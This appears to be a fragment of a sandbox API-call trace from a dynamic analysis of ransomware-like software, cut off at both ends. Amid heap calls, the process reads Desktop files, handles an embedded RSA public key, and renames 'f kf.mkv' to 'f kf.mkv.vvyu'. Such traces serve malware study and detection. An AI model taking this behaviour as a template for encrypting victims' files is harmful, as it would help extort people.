RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e798 [0183.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7f8 [0183.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e810 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7b0 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e780 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3f908 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3fb18 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d3fd30 [0183.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.634] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fd30 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30eb0 | out: hHeap=0x6a0000) returned 1 [0183.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f908 | out: hHeap=0x6a0000) returned 1 [0183.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.640] WriteFile (in: hFile=0x584, lpBuffer=0x2d36670*, nNumberOfBytesToWrite=0x5287, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d36670*, lpNumberOfBytesWritten=0x30ffb14*=0x5287, lpOverlapped=0x0) returned 1 [0183.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.641] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x528c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.641] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d3f908 [0183.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d3f908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d3fd38 [0183.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f908 | out: hHeap=0x6a0000) returned 1 [0183.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.643] WriteFile (in: hFile=0x584, lpBuffer=0x2d3fd38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d3fd38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fd38 | out: hHeap=0x6a0000) returned 1 [0183.643] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.643] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.643] CloseHandle (hObject=0x584) returned 1 [0183.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0183.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d3f908 [0183.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.652] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\f kf.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\f kf.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\f kf.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\f kf.mkv.vvyu")) returned 1 [0183.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f908 | out: hHeap=0x6a0000) returned 1 [0183.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.659] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.662] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ee89ba0, ftCreationTime.dwHighDateTime=0x1d8a497, ftLastAccessTime.dwLowDateTime=0xd5b8fa20, ftLastAccessTime.dwHighDateTime=0x1d8a586, ftLastWriteTime.dwLowDateTime=0xd5b8fa20, ftLastWriteTime.dwHighDateTime=0x1d8a586, nFileSizeHigh=0x0, nFileSizeLow=0x102d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FDSFO0.avi", cAlternateFileName="")) returned 1 [0183.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30eb0 [0183.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0183.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30eb0 | out: hHeap=0x6a0000) returned 1 [0183.663] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\FDSFO0.avi") returned=".avi" [0183.663] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FDSFO0.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\fdsfo0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.663] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=66262) returned 1 [0183.663] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.666] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x102b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.666] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.668] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.668] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x102d6, lpOverlapped=0x0) returned 1 [0183.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.669] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.670] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.670] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.670] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.670] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.670] GetLastError () returned 0x0 [0183.671] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.671] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.671] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.671] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.671] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x102e0) returned 0x2d43778 [0183.672] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0183.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30eb0 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30ef8 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.673] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0183.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0183.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7b0 [0183.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e798 [0183.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.677] GetCurrentThreadId () returned 0x264 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce530 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.677] GetCurrentThreadId () returned 0x264 [0183.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.679] RtlAllocateHeap 